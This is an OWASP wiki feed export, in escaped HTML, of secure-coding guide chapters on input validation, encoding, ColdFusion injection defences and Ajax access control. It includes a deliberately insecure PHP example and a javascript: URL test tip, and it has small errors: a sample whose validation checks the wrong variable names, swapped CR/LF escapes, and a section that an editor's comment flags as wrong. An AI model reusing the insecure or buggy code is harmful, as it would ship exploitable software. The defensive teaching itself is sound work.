&amp;lt;bean:write name=&amp;quot;loopVar&amp;quot; property=&amp;quot;name&amp;quot;/&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/logic:iterate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The code will emit HTML with the values &amp;quot;1&amp;quot; .. &amp;quot;x&amp;quot; as per the collection's content. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;1&amp;quot; /&amp;gt;Gold Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;2&amp;quot; /&amp;gt;Platinum Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach should be used for any input type that allows a value to be set: radio buttons, checkboxes, and particularly select / option lists.&lt;br /&gt;
&lt;br /&gt;
===Per-User Data ===&lt;br /&gt;
&lt;br /&gt;
In fully normalized databases, the aim is to minimize the amount of repeated data. However, some data is inferred. For example, users can see messages that are stored in a messages table. Some messages are private to the user. However, in a fully normalized database, the list of message IDs are kept within another table:&lt;br /&gt;
&amp;lt;!-- dkaplan: IMPORTANT: if users have messages, this is NOT a normalized table, it is denormalized.  If users have messages, it is normalized by putting a userid in the MESSAGES table. This section is claiming the opposite.  --&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
+------------------------+&lt;br /&gt;
|       MESSAGES         |&lt;br /&gt;
+------------------------+&lt;br /&gt;
|  msgid   |   message   |&lt;br /&gt;
+------------------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a user marks a message for deletion, the usual way is to recover the message ID from the user, and delete that:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE msgid='frmMsgId' &lt;br /&gt;
&lt;br /&gt;
However, how do you know if the user is eligible to delete that message ID? Such tables need to be denormalized slightly to include a user ID or make it easy to perform a single query to delete the message safely. For example, by adding back an (optional) uid column, the delete is now made reasonably safe:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE uid='session.myUserID' and msgid='frmMsgId'; &lt;br /&gt;
&lt;br /&gt;
Where the data is potentially both a private resource and a public resource (for example, in the secure message service, broadcast messages are just a special type of private message), additional precautions need to be taken to prevent users from deleting public resources without authorization. This can be done using role based checks, as well as using SQL statements to discriminate by message type:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message  &lt;br /&gt;
 WHERE&lt;br /&gt;
 uid='session.myUserID' AND&lt;br /&gt;
 msgid='frmMsgId' AND&lt;br /&gt;
 broadcastFlag = false;&lt;br /&gt;
&lt;br /&gt;
==URL encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent via the URL, which is strongly discouraged, should be URL encoded and decoded. This reduces the likelihood of cross-site scripting attacks from working.&lt;br /&gt;
&lt;br /&gt;
In general, do not send data via GET request unless for navigational purposes.&lt;br /&gt;
&lt;br /&gt;
==HTML encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent to the user needs to be safe for the user to view. This can be done using &amp;lt;bean:write ...&amp;gt; and friends. Do not use &amp;lt;%=var%&amp;gt; unless it is used to supply an argument for &amp;lt;bean:write...&amp;gt; or similar. &lt;br /&gt;
&lt;br /&gt;
HTML encoding translates a range of characters into their HTML entities. For example, &amp;gt; becomes &amp;amp;amp;gt; This will still display as &amp;gt; on the user's browser, but it is a safe alternative.&lt;br /&gt;
&lt;br /&gt;
==Encoded strings ==&lt;br /&gt;
&lt;br /&gt;
Some strings may be received in encoded form. It is essential to send the correct locale to the user so that the web server and application server can provide a single level of canoncalization prior to the first use. &lt;br /&gt;
&lt;br /&gt;
Do not use getReader() or getInputStream() as these input methods do not decode encoded strings. If you need to use these constructs, you must decanoncalize data by hand. &lt;br /&gt;
&lt;br /&gt;
==Data Validation and Interpreter Injection ==&lt;br /&gt;
&lt;br /&gt;
This section focuses on preventing injection in ColdFusion. Interpreter Injection involves manipulating application parameters to execute malicious code on the system. The most prevalent of these is SQL injection but it also includes other injection techniques, including LDAP, ORM, User Agent, XML, etc. – see the [[Reviewing_Code_for_OS_Injection|Interpreter Injection]] chapter of this document for greater details. As a developer you should assume that all input is malicious. Before processing any input coming from a user, data source, component, or data service it should be validated for type, length, and/or range. ColdFusion includes support for Regular Expressions and CFML tags that can be used to validate input.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&lt;br /&gt;
&lt;br /&gt;
[[SQL Injection]] involves sending extraneous SQL queries as variables. ColdFusion provides the &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; tags for validating database parameters. These tags nests inside &amp;lt;cfquery&amp;gt; and &amp;lt;cfstoredproc&amp;gt;, respectively. For dynamic SQL submitted in &amp;lt;cfquery&amp;gt;, use the CFSQLTYPE attribute of the &amp;lt;cfqueryparam&amp;gt; to validate variables against the expected database datatype. Similarly, use the CFSQLTYPE attribute of &amp;lt;cfprocparam&amp;gt; to validate the datatypes of stored procedure parameters passed through &amp;lt;cfstoredproc&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also strengthen your systems against SQL Injection by disabling the Allowed SQL operations for individual data sources. See the '''Configuration''' section below for more information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''LDAP Injection'''&lt;br /&gt;
&lt;br /&gt;
[[LDAP injection]] is an attack used to exploit web based applications that construct LDAP statements based on user input. ColdFusion uses the &amp;lt;cfldap&amp;gt; tag to communicate with LDAP servers. This tag has an ACTION attribute which dictates the query performed against the LDAP. The valid values for this attribute are: add, delete, query (default), modify, and modifyDN. &amp;lt;cfldap&amp;gt; calls are turned into JNDI (Java Naming And Directory Interface) lookups. However, because &amp;lt;cfldap&amp;gt; wraps the calls, it will throw syntax errors if native JNDI code is passed to its attributes making LDAP injection more difficult.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XML Injection'''&lt;br /&gt;
&lt;br /&gt;
Two parsers exist for XML data – SAX and DOM. ColdFusion uses DOM which reads the entire XML document into the server’s memory. This requires the administrator to restrict the size of the JVM containing ColdFusion.  ColdFusion is built on Java therefore by default, entity references are expanded during parsing. To prevent unbounded entity expansion, before a string is converted to an XML DOM, filter out DOCTYPES elements.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After the DOM has been read, to reduce the risk of XML Injection use the ColdFusion XML decision functions: isXML(), isXmlAttribute(), isXmlElement(), isXmlNode(), and isXmlRoot(). The isXML() function determines if a string is well-formed XML. The other functions determine whether or not the passed parameter is a valid part of an XML document. Use the xmlValidate() function to validate external XML documents against a Document Type Definition (DTD) or XML Schema.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Event Gateway, IM, and SMS Injection'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 enables Event Gateways, instant messaging (IM), and SMS (short message service) for interacting with external systems. Event Gateways are ColdFusion components that respond asynchronously to non-HTTP requests – e.g. instant messages, SMS text from wireless devices, etc. ColdFusion provides Lotus Sametime and XMPP (Extensible Messaging and Presence Protocol) gateways for instant messaging. It also provides an event gateway for interacting with SMS text messages.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Injection along these gateways can happen when end users (and/or systems) send malicious code to execute on the server. These gateways all utilize ColdFusion Components (CFCs) for processing. Use standard ColdFusion functions, tags, and validation techniques to protect against malicious code injection. Sanitize all input strings and do not allow un-validated code to access backend systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use the XML functions to validate XML input.&lt;br /&gt;
&lt;br /&gt;
*Before performing XPath searches and transformations in ColdFusion, validate the source before executing.&lt;br /&gt;
&lt;br /&gt;
*Use ColdFusion validation techniques to sanitize strings passed to xmlSearch for performing XPath queries. &lt;br /&gt;
&lt;br /&gt;
*When performing XML transformations only use a trusted source for the XSL stylesheet.&lt;br /&gt;
&lt;br /&gt;
*Ensure that the memory size of the Java Sandbox containing ColdFusion can handle large XML documents without adversely affecting server resources.&lt;br /&gt;
&lt;br /&gt;
*Set the memory value to less than the amount of RAM on the server (-Xmx).&lt;br /&gt;
&lt;br /&gt;
*Remove DOCTYPE elements from the XML string before converting it to an XML object.&lt;br /&gt;
&lt;br /&gt;
*Using scriptProtect can be used to thwart most attempts of cross-site scripting. Set scriptProtect to All in the Application.cfc.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfparam&amp;gt; or &amp;lt;cfargument&amp;gt; to instantiate variables in ColdFusion. Use this tag with the name and type attributes. If the value is not of the specified type, ColdFusion returns an error.&lt;br /&gt;
&lt;br /&gt;
*To handle untyped variables use IsValid() to validate its value against any legal object type that ColdFusion supports.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; to valid dynamic SQL variables against database datatypes.&lt;br /&gt;
&lt;br /&gt;
*Use CFLDAP for accessing LDAP servers. Avoid allowing native JNDI calls to connect to LDAP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice in Action'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The sample code below shows a database authentication function using some of the input validation techniques discussed in this section.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, uUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, uPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
FROM UserTable&lt;br /&gt;
&lt;br /&gt;
WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Delimiter and special characters ==&lt;br /&gt;
&lt;br /&gt;
There are many characters that mean something special to various programs. If you followed the advice only to accept characters that are considered good, it is very likely that only a few delimiters will catch you out. &lt;br /&gt;
&lt;br /&gt;
Here are the usual suspects:&lt;br /&gt;
&lt;br /&gt;
* NULL (zero) %00&lt;br /&gt;
&lt;br /&gt;
* LF - ANSI chr(10) &amp;quot;\r&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - ANSI chr(13) &amp;quot;\n&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CRLF - &amp;quot;\n\r&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - EBCDIC 0x0f &lt;br /&gt;
&lt;br /&gt;
* Quotes &amp;quot; '&lt;br /&gt;
&lt;br /&gt;
* Commas, slashes spaces and tabs and other white space - used in CSV, tab delimited output, and other specialist formats&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;&amp;gt; - XML and HTML tag markers, redirection characters&lt;br /&gt;
&lt;br /&gt;
* ; &amp;amp; - Unix and NT file system continuance&lt;br /&gt;
&lt;br /&gt;
* @ - used for e-mail addresses&lt;br /&gt;
&lt;br /&gt;
* 0xff&lt;br /&gt;
&lt;br /&gt;
* ... more&lt;br /&gt;
&lt;br /&gt;
Whenever you code to a particular technology, you should determine which characters are &amp;quot;special&amp;quot; and prevent them appearing in input, or properly escaping them.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ASP.NET 2.0 Viewstate&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://channel9.msdn.com/wiki/default.aspx/Channel9.HowToConfigureTheMachineKeyInASPNET2&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Validation]]&lt;br /&gt;
[[Category:Encoding]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59647</id>
		<title>Ajax and Other &quot;Rich&quot; Interface Technologies</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59647"/>
				<updated>2009-04-29T12:30:16Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Access control: Authentication and Authorization */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
'''''Style is time’s fool. Form is time’s student – Stewart Brand '''''&lt;br /&gt;
&lt;br /&gt;
Ajax applications, often styled as “Web 2.0”, are not a form of magic security pixie dust. Instead, there are two classes of applications: secure and insecure. This is independent of the use of Ajax or similar technologies that preceded it, such as Flash, applets, or ActiveX. With some effort, Ajax applications can be secure. Unfortunately, many are not, which is the '''''raison d’être''''' of this chapter.&lt;br /&gt;
&lt;br /&gt;
The acronym AJAX stands for Asynchronous JavaScript and XML. These technologies underpinning Ajax are not new – they first appeared in 1998 with Microsoft Outlook Web Access in Exchange Server 5.5. “Web 2.0” was defined by Tim O’Reilly to mean highly peer-to-peer dynamic applications. Such applications include del.icio.us library that allows users to share their libraries’ details, or Flickr that allows users to share their photos in a highly interactive way. We define “Ajax applications” as those that use the XMLHttpRequest object to asynchronously call the server and receive replies, regardless of how they handle or display the received data, or if they are public peer-to-peer low value applications such as forum software or highly sensitive private data, such as a tax return lodgment application.&lt;br /&gt;
&lt;br /&gt;
Ajax enabled applications aim to increase the interactivity and richness of the web interface. Secure Ajax applications are achievable at minimal cost increase as long as security is considered during design and tested throughout development. &lt;br /&gt;
&lt;br /&gt;
Compliance with disability laws is mandatory for all government and most corporate organizations. Ajax framework developers who wish to be used by these types of organizations must ensure their code supports common accessibility aides. Ajax framework users should select frameworks that produce accessible output and design their applications to be accessible and test regularly. In most countries, to do otherwise is simply deliberate negligence, and is often harshly punished by the courts. &lt;br /&gt;
&lt;br /&gt;
Ajax applications face '''''exactly the same '''''security issues as all other web applications, plus they add their own particular set of risks that must be correctly managed. By their complex, bidirectional, and asynchronous nature, Ajax applications increase attack surface area. &lt;br /&gt;
&lt;br /&gt;
Use of Ajax (or any rich interface) requires careful consideration of architecture, server-side access control, state management, and strong validation to prevent attacks. Without considering these basic controls, even brochure-ware websites, such as car manufacturer websites, can be a hazard to both the user and the web site owner’s reputation and thus sales.&lt;br /&gt;
&lt;br /&gt;
At the time of writing, there is a multitude of Ajax frameworks and add-ons, and many more being written every day. Users of Ajax frameworks should ensure that their chosen framework meets the security risks of their particular application, and does not impose an unsecurable architecture upon them. &lt;br /&gt;
&lt;br /&gt;
Developers of Ajax frameworks should investigate the controls presented in this chapter, and associated controls documented throughout the rest of this book to ensure that their approach is simple, accessible, and secure.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that AJAX (and all “rich” interactive interfaces, such as Flash and Shockwave) have adequate:&lt;br /&gt;
&lt;br /&gt;
* Secure Communications&lt;br /&gt;
&lt;br /&gt;
* Authentication and Session Management&lt;br /&gt;
&lt;br /&gt;
* Access Control &lt;br /&gt;
&lt;br /&gt;
* Input Validation&lt;br /&gt;
&lt;br /&gt;
* Error Handling and Logging&lt;br /&gt;
&lt;br /&gt;
To prevent applications from being attacked using known attack vectors, such as unauthorized access, injection attacks, and so on.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
* All Server Platforms&lt;br /&gt;
&lt;br /&gt;
* Web applications which use Ajax, ActiveX, Flash or Shockwave&lt;br /&gt;
&lt;br /&gt;
* Clients which are required to use such applications&lt;br /&gt;
&lt;br /&gt;
==Architecture ==&lt;br /&gt;
&lt;br /&gt;
Appropriate security architecture should be considered when implementing Ajax front ends. Some Ajax frameworks will proudly display that they are 100% client based, with no server side controls, such as Tibco and Atlas (an Ajax framework for .NET). &lt;br /&gt;
&lt;br /&gt;
Strong security architecture provides adequate defense in depth, and architecturally correct placement of key security controls. For more details, see the Security Architecture chapter.&lt;br /&gt;
[[Category:FIXME|I wanted to make Security Architecture a link, but I am not sure what section it refers to]]&lt;br /&gt;
&lt;br /&gt;
For some types of applications, such as brochure-ware and non-interactive applications, such as stock tickers, this is acceptable security architecture as the risks are low – it would be hard to obviate the security controls to lose actual money. However, as the risk of the application increases, the threats and countermeasures required also increase. &lt;br /&gt;
&lt;br /&gt;
'''Architecture by example '''&lt;br /&gt;
&lt;br /&gt;
For the purposes of this section, irs.gov.ex, a taxation department of a fictitious country, has decided to implement an Ajax enabled electronic lodgment and tracking service for all of its 100 million taxpayers. A key reason to move to the new system is to reduce the workload on existing staff for the 90+% of tax returns that could be processed automatically … as long as the taxpayers do not deliberately lie, deceive, or cheat the system. Which of course, they do regularly. &lt;br /&gt;
&lt;br /&gt;
They bought a fancy new Enterprise Service Bus (ESB), to which they hooked up their old but incredibly reliable mainframe backend, their SAP R/3 implementation that writes the checks and tax invoices, and several other key systems. &lt;br /&gt;
&lt;br /&gt;
This particular ESB, like many on the market today, has no data validation, authentication, or authorization controls of its own; it is a simple web-service integration layer. The ESB expects that the underlying systems will perform adequate validation and authorization to prevent abuse, as the software company that wrote the ESB expected that all calling systems would be trusted, internal systems. Hooking up a dynamic web site where the users are known to be relentless, eager, and motivated tax avoiders changes the risk profile of a previously internal system with trusted staff.&lt;br /&gt;
&lt;br /&gt;
The tax department does not want to change existing systems as they are in production and stable. More to the point, they cannot change their mainframe code easily - their skilled mainframe programmers either were promoted to senior management or retired 15 years ago, and it would be extremely costly to hire new mainframe developers, and impossible to change how the third party systems work, like SAP or their anti-fraud system. &lt;br /&gt;
&lt;br /&gt;
Old code, such as COBOL CICS transactions, or previously internal only systems such as SAP R/3, have a different trust model than highly dynamic Internet connected websites. It is highly likely such systems have never been tested against now common attacks, such as HTML injection (XSS), DOM injection, XML query attacks, or similar. Without any intermediate code to protect these older systems, they are at immense risk.&lt;br /&gt;
&lt;br /&gt;
The tax department selected a simple solution in the belief it will save money. In this first example, the bulk of the business logic is contained in deployed JavaScript applications. All of the business logic, validation, and state are contained in the client’s browser, and it makes direct calls to the enterprise service bus. &lt;br /&gt;
&lt;br /&gt;
However, this model is simply broken: the previously generic process orchestration service will need to become far more aware of the caller’s identity (to provide authentication and enforce authorization), maintain secure state, and provide validation services that have previously been performed on the client. &lt;br /&gt;
&lt;br /&gt;
[[Image:Insecure Security and state maintained on the client.gif]]&lt;br /&gt;
&lt;br /&gt;
This security model is akin to leaving the keys to the Reserve Bank at the train station notice board. There is no method of protecting this model without significant replication of the business logic and re-validating all the state at the enterprise service bus, or similar web service endpoints. &lt;br /&gt;
&lt;br /&gt;
Many enterprises, including irs.gov.ex, have taken to service oriented architecture (SOA), which uses web services enabling re-use of pre-existing transactions and systems, such as SAP or Siebel, or custom transactions running on mainframes. If an Ajax framework is connected to such SOA endpoints, such as an enterprise service bus, or directly to a backend data warehouse or other persistent store, there is no ability to validate the calling identity, authorize the transaction, validate the data, or any other normal security activity. So this model will not do. &lt;br /&gt;
&lt;br /&gt;
In the next model, which is how most PHP application frameworks work today, the Ajax xmlrpc endpoint is not necessarily well integrated with the main application. &lt;br /&gt;
&lt;br /&gt;
[[Image: Insecure Ajax Web Service Endpoint separate from the main application.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, if the Ajax endpoint cannot or does not access secure state, or associate the call with the active session, a hostile caller could emulate an active session and call protected resources with minimal skills or tools. This vulnerability has already been demonstrated with several popular Ajax PHP toolkits on Bugtraq, and probably applies to other less well-known toolkits for other languages and platforms.&lt;br /&gt;
&lt;br /&gt;
The best way to protect both of these models is to bring them back to the normal three-tier application model:&lt;br /&gt;
&lt;br /&gt;
[[Image: Better Shared business logic in the middle tier with different front ends.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, which is akin to how GMail works, the application is still significantly Ajax enabled, and provides a rich experience to the user. However, this code is backed by:&lt;br /&gt;
&lt;br /&gt;
* A solid session management scheme to ensure that authentication and authorization is performed in a trusted part of the architecture&lt;br /&gt;
&lt;br /&gt;
* Data validation is performed in both directions on the server-side at various layers to limit or prevent injection and other attacks&lt;br /&gt;
&lt;br /&gt;
* All calls to the backend services are performed by trusted server-side business logic&lt;br /&gt;
&lt;br /&gt;
* The layered architecture allows reasonable trust of the caller at the ESB level as the data has been significantly authorized and validated&lt;br /&gt;
&lt;br /&gt;
This means that the ESB and its published services, such as 40 year old COBOL code, do not need to be particularly aware of the implications of being made available to the Internet. This enables higher levels of re-use and reduces costs.&lt;br /&gt;
&lt;br /&gt;
Although more complex to the project implementing the Ajax enabled application, to the funding business, this architecture is the cheapest way of maintaining security whilst avoiding updating or maintaining ancient or third party code.&lt;br /&gt;
&lt;br /&gt;
Selecting the correct architecture is unfortunately not a checklist – it is a balance of risk versus cost. However, as demonstrated in this section, client-side heavy architecture models are completely untrustworthy for transactional systems and should be avoided.&lt;br /&gt;
&lt;br /&gt;
==Access control: Authentication and Authorization ==&lt;br /&gt;
[[Category:FIXME|Starting here, should these sections be part of this article? Or do they go somewhere else with links here?]]&lt;br /&gt;
&lt;br /&gt;
Ajax code uses the XMLHttpRequest object, which will send the cookies of the current browser context through with each request. For applications which have user sessions, it is vital that normal authentication paths are used to ensure that the caller is known to the application. Brochure-ware applications can skip this section as they allow anonymous calling.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If you have transactions or calls that are not to be used by anonymous callers, check that client-side code cannot call them without an established user context.&lt;br /&gt;
&lt;br /&gt;
To do this: &lt;br /&gt;
&lt;br /&gt;
* Fire up your favorite proxy tool, such as WebScarab&lt;br /&gt;
&lt;br /&gt;
* Generate an authenticated XMLHttpRequest using the browser&lt;br /&gt;
&lt;br /&gt;
* Right click on the resulting entry in WebScarab, click “Re-send” &lt;br /&gt;
&lt;br /&gt;
* Edit out the cookie&lt;br /&gt;
&lt;br /&gt;
See if a valid result is returned. If yes, you are vulnerable. Repeat for every Ajax enabled server-side service.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that every Ajax callable function, whether XMLRPC, custom code, or a web service verify the session and authorization. &lt;br /&gt;
&lt;br /&gt;
For example, in typical Ajax style, CPaint uses this insecure example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php?  &lt;br /&gt;
&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
return($sales_amount * 0.075);?&lt;br /&gt;
&lt;br /&gt;
}?&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Let’s add some session authentication, authorization and data validation, and business rule validation: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php?  &lt;br /&gt;
&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// check that the session is logged in ?&lt;br /&gt;
&lt;br /&gt;
	assert_login();&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
	// check that the user has the USER role to prevent &lt;br /&gt;
&lt;br /&gt;
// guest and admin access&lt;br /&gt;
&lt;br /&gt;
	assert_role(‘USER’);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Validate data and business rules&lt;br /&gt;
&lt;br /&gt;
if ( is_numeric($sales_amount) &amp;amp;&amp;amp; $sales_amount &amp;gt; 0 )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// Perform the calculation and return&lt;br /&gt;
&lt;br /&gt;
return($sales_amount * 0.075);?&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// Data failed validation and business rules&lt;br /&gt;
&lt;br /&gt;
return -1;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With these simple changes, we ensure that:&lt;br /&gt;
&lt;br /&gt;
* (Authentication) Enforce that the user is logged on&lt;br /&gt;
&lt;br /&gt;
* (Authorization and Compliance) Enforce role authorization and provide SOX-compliant segregation of duties&lt;br /&gt;
&lt;br /&gt;
* (Data Validation) Ensure that the data is safe to perform our calculation&lt;br /&gt;
&lt;br /&gt;
* (Business Rule Validation) Lastly, check the data is within acceptable business rule boundaries as it is not a good idea to calculate tax for negative and zero values&lt;br /&gt;
&lt;br /&gt;
Obviously, performing a tax rate calculation is not that important, but if it was an insurance premium calculator (which uses highly sensitive actuary data) this is the minimum you would expect to see for sensitive code.&lt;br /&gt;
&lt;br /&gt;
==Silent transactional authorization ==&lt;br /&gt;
&lt;br /&gt;
Any system that silently processes transactions using a single submission is dangerous to the client. For example, if a normal web application allows a simple URL submission, a preset session attack will allow the attacker to complete a transaction without the user’s authorization. In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page, so an injected attack script may be able to steal money from the client without authorization. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
Determine if the application:&lt;br /&gt;
&lt;br /&gt;
* Is vulnerable to DOM injection and can run arbitrary JavaScript&lt;br /&gt;
&lt;br /&gt;
* If the browser allows execution of loaded JavaScript via URL entry, by navigating to the transaction submission page, and then typing in javascript:function(args). If the JavaScript is executed, it is likely that spyware will also be able to execute this code via the DOM model&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that all transactions are conducted with appropriate authorization, including transaction signing as necessary&lt;br /&gt;
&lt;br /&gt;
==Untrusted or absent session data ==&lt;br /&gt;
&lt;br /&gt;
A common mis-implementation with Ajax is the desire to call a second server. &lt;br /&gt;
&lt;br /&gt;
[[Image:Ajax Second Server.gif]]&lt;br /&gt;
&lt;br /&gt;
Session data on the first server usually contains relatively trustworthy authentication and authorization information, as well as sensitive state, but in general, the second server cannot access this information in a timely or safe fashion. &lt;br /&gt;
&lt;br /&gt;
An example includes running an Ajax application on &amp;lt;u&amp;gt;http://www.example.com&amp;lt;/u&amp;gt;, and the Ajax code is able to directly process share trades on &amp;lt;u&amp;gt;http://market.somebiginvestmentfirm.com/&amp;lt;/u&amp;gt; via the use of embedded trust or embedded credentials. &lt;br /&gt;
&lt;br /&gt;
